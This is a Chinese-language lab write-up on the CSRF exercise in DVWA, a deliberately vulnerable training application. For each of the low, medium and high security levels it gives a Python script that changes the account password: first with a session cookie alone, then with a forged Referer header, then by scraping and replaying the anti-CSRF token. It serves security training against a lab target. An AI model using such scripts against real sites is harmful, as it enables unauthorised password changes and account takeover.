low
設置一下cookie的PHPSESSID和security即可跨站請求
import requests
def main():
url = 'http://192.168.67.22/dvwa/vulnerabilities/csrf/index.php'
headers = {
'Cookie': 'PHPSESSID=88airjn39jqo5mi25fnngko6f0; security=low',
}
new_password = 'ac'
url = '%s?password_new=%s&password_conf=%s&Change=Change' % (url, new_password, new_password)
res = requests.get(url, headers=headers)
if 'Password Changed.' in res.content:
print('Yes')
else:
print('No')
if __name__ == '__main__':
main()
medium
查看源碼,發現
// Checks to see where the request came from
if( eregi( $_SERVER[ 'SERVER_NAME' ], $_SERVER[ 'HTTP_REFERER' ] ) )
根據Referer驗證請求來源,繞過思路:在HTTP請求頭聲明Referer。
import requests
def main():
url = 'http://192.168.67.22/dvwa/vulnerabilities/csrf/index.php'
headers = {
'Cookie': 'PHPSESSID=88airjn39jqo5mi25fnngko6f0; security=medium',
'Referer': 'http://192.168.67.22/dvwa/vulnerabilities/csrf/'
}
new_password = 'ac'
url = '%s?password_new=%s&password_conf=%s&Change=Change' % (url, new_password, new_password)
res = requests.get(url, headers=headers)
if 'Password Changed.' in res.content:
print('Yes')
else:
print('No')
if __name__ == '__main__':
main()
high
查看源碼,發現多了動態user_token驗證
// Check Anti-CSRF token
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
繞過思路:在代碼層面發跨站請求動態獲取user_token,再發跨站請求修改密碼。
import requests
import re
def main():
url = 'http://192.168.67.22/dvwa/vulnerabilities/csrf/index.php'
headers = {
'Cookie': 'PHPSESSID=88airjn39jqo5mi25fnngko6f0; security=high',
'Referer': 'http://192.168.67.22/dvwa/vulnerabilities/csrf/'
}
res = requests.get(url, headers=headers)
m = re.search(r"user_token' value='(.*?)'", res.content, re.M | re.S)
if m:
user_token = m.group(1)
new_password = 'ac'
url = '%s?password_new=%s&password_conf=%s&user_token=%s&Change=Change' % (url, new_password, new_password, user_token)
res = requests.get(url, headers=headers)
if 'Password Changed.' in res.content:
print('Yes')
else:
print('No')
print(res.content)
if __name__ == '__main__':
main()
注:這3個實驗要跨站,別一直都在本地同一個瀏覽器測試,這沒意思。